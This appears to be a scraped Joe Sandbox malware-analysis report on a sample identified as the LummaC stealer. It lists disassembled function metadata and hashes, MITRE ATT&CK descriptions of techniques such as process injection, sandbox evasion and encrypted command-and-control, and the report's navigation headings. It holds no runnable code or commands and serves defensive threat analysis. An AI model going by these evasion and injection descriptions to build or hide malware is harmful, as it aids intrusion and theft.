Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: InitVariant
String ID: I$Q$S$U$W$Z$[$]$_
API String ID: 1927566239-1271914970
Opcode ID: 2b21bb6aca48bbb9a17ae6c9bc01f9bff2128a4a2926268569e768692de47457
Instruction ID: b542ac2b38b6f05239e9676b6722b9bf3b7b62eca663bba5b3453fd852099081
Opcode Fuzzy Hash: 2b21bb6aca48bbb9a17ae6c9bc01f9bff2128a4a2926268569e768692de47457
Instruction Fuzzy Hash: EC41DF7050C7C18AD3329B3884487DBBBE0ABAA314F440A9DE5ED87382C7B49545CB53

Function 0071420C Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 191COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 0071421A

Strings

<, xrefs: 007142F0
5, xrefs: 00714300
8, xrefs: 007142F8
%, xrefs: 007142E8
9, xrefs: 00714308

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: String
String ID: %$5$8$9$<
API String ID: 2568140703-2114583083
Opcode ID: 862b1587b10ca5408a11da75eed91e292e39c6b37fe3b9c513f021ca299d7ad2
Instruction ID: cdba555525f27d2fc6116de6e96a0999c7629af0b58b0d8f434f6c63fcfe920c
Opcode Fuzzy Hash: 862b1587b10ca5408a11da75eed91e292e39c6b37fe3b9c513f021ca299d7ad2
Instruction Fuzzy Hash: A47173726083908FC7399E2CC4903EEBAD2AFD9324F194A2DD9E9873D1DB3858418753

Function 00715C31 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 184COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 00715C3F

Strings

%, xrefs: 00715D13
8, xrefs: 00715D23
<, xrefs: 00715D1B
9, xrefs: 00715D33
5, xrefs: 00715D2B

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: String
String ID: %$5$8$9$<
API String ID: 2568140703-2114583083
Opcode ID: a6d8188b24bda65e1b545b69dce97399d44d8d53251c6c56d7ebfe8f0410fffd
Instruction ID: b7405ac704d751d52244decaf05872605f9e93c294625babaabbada90f6ce49b
Opcode Fuzzy Hash: a6d8188b24bda65e1b545b69dce97399d44d8d53251c6c56d7ebfe8f0410fffd
Instruction Fuzzy Hash: 6F71B771A097908FC7398E2CC4943EEBAD2AFD5324F194A2DD8E9873C1DB785D458782

Function 007184A5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 007184F0
GetSystemMetrics.USER32 ref: 007184FF

Strings

, xrefs: 007185D3

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: c5bec40ba826152d3602649569a592bb6802e64e82bd799f9c50160a9fabd410
Instruction ID: eddeaca216207de96cd5084c224922bfaff417f4b54a31c0ee29706b3397efb9
Opcode Fuzzy Hash: c5bec40ba826152d3602649569a592bb6802e64e82bd799f9c50160a9fabd410
Instruction Fuzzy Hash: 6C516DB0E142189FDB50EFACD985A9EBBF0BB48300F118529E898E7350D774A945CF96

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
file.exe

Function 006EE9C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141
libraryCOMMON

Function 0071EB20 Relevance: 3.1, APIs: 2, Instructions: 135
COMMON

Function 0071ED40 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 315
memoryCOMMON

Function 006ECE80 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 165
threadCOMMON

Function 0071F159 Relevance: 6.0, APIs: 4, Instructions: 30
COMMON

Function 00722CE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memoryCOMMON

Function 00724CCE Relevance: 1.6, APIs: 1, Instructions: 71
libraryCOMMON

Function 00722D62 Relevance: 1.5, APIs: 1, Instructions: 44
memoryCOMMON

Function 0071F2DE Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Function 00725D10 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 0071ED1C Relevance: 1.5, APIs: 1, Instructions: 12
COMMON